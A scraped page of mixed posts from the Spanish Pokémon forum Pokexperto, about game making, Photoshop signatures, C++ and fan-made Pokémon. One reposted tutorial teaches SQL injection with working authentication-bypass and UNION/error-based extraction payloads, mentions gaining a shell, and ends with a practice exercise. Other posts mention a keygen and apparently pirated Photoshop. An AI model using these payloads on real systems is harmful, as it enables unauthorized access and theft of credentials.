Foros Pokexperto

Estoy intentando hacer un juego de Zombies, (Para un proyecto del colegio, sobre centrales nucleares), para eso, creo el Zombie en Blender con su animación, pero cuando lo paso al Unity3D, la armature hace una cosa rara y la animación se vuelve un caos. Alguien que sepa usar Blender o Unity3D que me diga si hay una manera de importar archivos .FBX de Blender sin que se rompan al entrar en Unity3D.

Me he instalado el GM8, y con el el Keygen.....solo que cuando inicio el GM8, la pantalla se vuelve blanca y no aparece nada......me estoy desesperando, necesito alguna ayuda.

Me acabo de comprar un Win7 y le estoy instalando cosas, le puse el Photoshop White Rabbit....pero no se me inicia....asi que pregunto si existe alguna versión de White Rabbit para Win7 o si necesito el Photoshop de toda la vida. 

Al igual que con Pokemon Blanco y Negro, para poder descubrir si de verdad va a haber un nuevo juego de Wii en RPG y como se llamará, necesitamos posibles nombres......el que sea, y luego se hará una votación para ver cual queda mejor.

Empiezo yo dando algunas posibilidades:

-Pokemon RPG (El mas simple)

-Pokemon Black & White RPG (O B&W Wii)

-Pokemon Gray

-Pokemon Wii

-Pokemon XD 3

-Pokemon Poketopia Adventures (Secuela al de Battle Frontier)

Información sobre el MySQL:
http://php.net/mysql
http://dev.mysql.com/

Los ataques SQL pueden ser evitados de muchas formas, iniciare con algunos ejemplos de instrucciones vulnerables, con las “magic quotes” desactivadas.

Ejemplo 1
Código:

$us=$_POST['usuario'];
$pass=$_POST['pass'];
$sql="SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'";

-- código largo cortado --
Código:

if(mysql_fetch_array($exc)){
echo "Inicio de sesión correcto"; // Esto fue modificado
}


Este es el tipico sistema de verificacion de contraseñas..
utiliza la instruccion mysql_fetch_array(funcion de mysql, que devuelve falso si no hay ningun resultado, en la 'querry', o petición), asi que si no hay ningun resultado donde el usuario y el password conuerden, el resultado es false :P.

como podemos hacer que no devuelva false??

    * Con el password correcto
    * Haciendo trampa


Logicamente, no usaremos la primera opción xD

Haciendo trampa.. se haria algo asi:
esta es la petición que solo nos deja pasar si sabesmos el pass..

SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'

ahora, ¿como se puede hacer que nos devuelva true aunque no sepamos el password, sabiendo que solo podemos modificar $pass y $us?
Supongamos que ponemos de usuario Pegaso, y de password pjps.
El usuario existe, pero no sabemos el pass..
la sentencia que SQL recibira sera:

SELECT * FROM usuarios WHERE user = 'Pegaso' AND password='pjps'

y como no hay ningun campo donde el usuario y el password coincidan, nos devolvera false :(

Ahora, con un poco de creatividad:
de usuario:    Pegaso
de password: ' OR ''='

la sentencia SQL recibira:
 
SELECT * FROM usuarios WHERE user = 'Pegaso' AND password='' OR ''=''

nos devolvera true, si hay algun resultado y como NADA siempre es igual a NADA, nos devolvera true, y pasamos el mecanismo de validación como Pegaso.

Otros posibles valores que devuelven true son:

    * usuario: Pegaso AND /*   password: */ ''='
    * usuario: ' OR 1=1 //


Ahora... que si quisieras saber el password.. (te advierto, que normalmente esta cifrado, y deberas desencriptarlo, con alguna herramienta para eso como john the ripper), tomemos el siguiente ejemplo

Ejemplo 2
Código:

$us=$_POST[‘usuario’];
$pas=$_POST[‘pass’];
if($_GET['usuario'] || $_GET['pass']){
die("Hack Attempt");
}
$sql="SELECT password FROM usuarios WHERE user = '$us'";

-- código largo cortado --
Código:

$resp = mysql_query($sql) or die(mysql_error());
if(mysql_fetch_array($resp)){
if($resp==$pas){
echo "Inicio de sesión exitoso"; // Esto fue modificado
}else{
echo "el password $resp es incorrecto";
}
}



Bien, este ejemplo, que se ve mucho mas seguro (y sacado de una aplicación real), ¿es vulnerable?
SI, ¿porque?
Ya quedamos en que no hay magic quotes, las magic quotes son una función que trata de desactivar todas las cadenas introducidas por el usuario, que parezcan peligrosas, como comillas, diagonales, \0 etc..
el webmaster pensó, que como no usaba el mysql_fetch_array, entonces no podian usar un ' OR ''=', como la inyección clasica, pasada.

Ahora, queremos sacar el password.. pero.. ¿como?

Hay una instruccion en SQL llamada UNION, que sirve para obtener información de 2 tablas, o..
Bueno.. UNION necesita algunos requisitos.

    * Necesitas meter la misma cantidad de valores que tiene la tabla.
    * Tener un informe de los errores que provocaremos en la instrucción


Bien ahora empezemos.
la instrucción a modificar es la siguiente:

SELECT password FROM usuarios WHERE user = '$us'

como ejemplo, si colocalmos de usuario: zanahoria
la instrucción que llega seria:

SELECT password FROM usuarios WHERE user = 'zanahoria'

Otra vez necesitamos creatividad :D
regresemos al UNION.

UNION necesita que el numero de columnas sea igual, sino sacara un error.

y exactamente, lo que necesitamos es un error, que nos diga cuando estamos mal, para saber cuando estamos bien.

el UNION se usa de esta forma:

usuario: ' AND 0 UNION SELECT 1 AND 'l'='
SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

para lo cual SQL nos respondera:
Citar
The used SELECT statements have a different number of columns:SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

Continuando por el mismo camino, podemos hacer que nos regrese un error, al tratar de UNIR un campo de tipo INT (osea que guarda numeros) a un CHAR (guarda letras)

Quedaria algo asi:

' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'zanahoria

la sentencia seria esta:

SELECT password FROM usuarios WHERE user = '' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'zanahoria'

que nos da como error:
Citar
Syntax error converting the varchar value 'naranja' to a column of data type int.

donde el password es naranja   8) 8)

Las inyecciones ultimamente han logrado tener mas poder que antes, segun el blog de acidbits, solo debemos sacar toda la información posible, y con un poco de esfuerzo, conseguimos tener control de archivos (crear, borrar, etc..).

el siguiente es un ejemplo, con la misma sentencia
usuario:
' AND 0 UNION SELECT 1,user(),3,4,5 AND 'l'='


y nos regresa:
Citar
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

que significa esto? que estamos metiendo valores en utf cuando debe ser en latin1.. eso lo arreglamos asi:

' AND 0 UNION SELECT 1,convert(user() using latin1),3,4,5 AND ''l='

y eso nos regresa:

Citar
root@localhost

esto, no es todo, con hacer que regrese valores con '<??>', podemos incluso crearnos nuestra shell.

Para ver el metodo completo de acidbits, da click aquí.

Ejercicio :):
¿Que puedes hacer con esta sentencia?
Código:

$sql="UPDATE clicks set dat=now(), aas=aas+1 where  ref='$HTTPREFFERER'";
$resp = mysql_query($sql) or die(mysql_error());


Coloca el archivo anexo en tu servidor, con las respectivas configuraciones SQL necesarias, en una carpeta protegida, e intenta autohackearte, eso te dara practica.

http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_inyeccion_sql_sql_injection-t98448.0.html#ixzz17dW8TAKl

Fuente: ElHacker.net

Por fin llega, una nueva revolución artística, ¡la de usar Renders sin sentido en firmas!
De momento solo hay tres, pero aquí podeis postear todas vuestras ¡Firmas con Renders sin Sentido!

Aqui van las primeras:

No se si se puede poner [Tema Oficial] Pero como no hay ninguno mas pues haya vamos.



Este es un Tema especial donde se podrá postear, comentar, opinar, y probar programas hechos en C++ y C, tambien se ofrezerá ayuda a gente que quiera aprender.

Para iniciar este Tema, aqui va una guia rápida de C++:

http://www.tecnun.es/asignaturas/Informat1/AyudaInf/aprendainf/cpp/basico/cppbasico.pdf

Y un programa hecho por mi:


Es simple, pero para que lo entendais

Si quieren saber algo, no duden en preguntarlo.

P.D: Haber quien es el primero que me dice para que sirve (Es muy fácil)

Como mi antiguo Taller de Firmas se cerró por falta de actividad (Seguramente está perdido entre millones de Temas) me he decidido a crear un nuevo Taller de Firmas que haré con Photoshop (Antes las hacía con Gimp).
(También hago Pokeballs)
Ejemplos Firmas:



Ejemplos Pokeballs:



Para pedirme una Firma solo teneis que postear:

• -Render de la Firma
  
• -Colores
  
• -Colores
  
• -Ambiente
  
• -Tamaño
  
• -Texto y Font
  
• -Extras
  

No creo que tarde mucho en daros los pedidos, espero que este Taller vaya para bien.

Vamos a ver, tengo el Photoshop White Rabbit, pero hay muchas herramientas que no encuentro, como el Smudge, y cuando le doy a R que se supone que es Smudge, me sale una ventana de error diciendo nosequé del OpenGL, como nunca he usado el Photoshop (Llevo toda la vida con el Gimp) Pediría amablemente si algun amable usuario me podria ayudar.

Region Kenta, situada al otro lado del mar desde Isshu, una zona con muchos contrastes diferentes en cuanto a diversidad de Pokemon y entornos.

La aventura empieza en el pueblo Meridia, donde la profesora Isabel te da a elegir entre estos 3 starters:


Planta

Catan
Pokemon Ave Tropical

"Un Pokemon que vive en regiones Tropicales,  cuando evoluciona, los machos ganan unos colores mas vívidos que las hembras"




Fuego

Firenzy
Pokemon Bola Ardiente

"Se creia que estos Pokemon nacian de las brasas de una fogata, que es donde solian vivir"







Agua

Memepa
Pokemon Mistico

"Un Pokemon magico que controla los flujos de agua con la mente, sus distintas caras muestra su estado"





Ya añadire mas Pokemon cuando tenga tiempo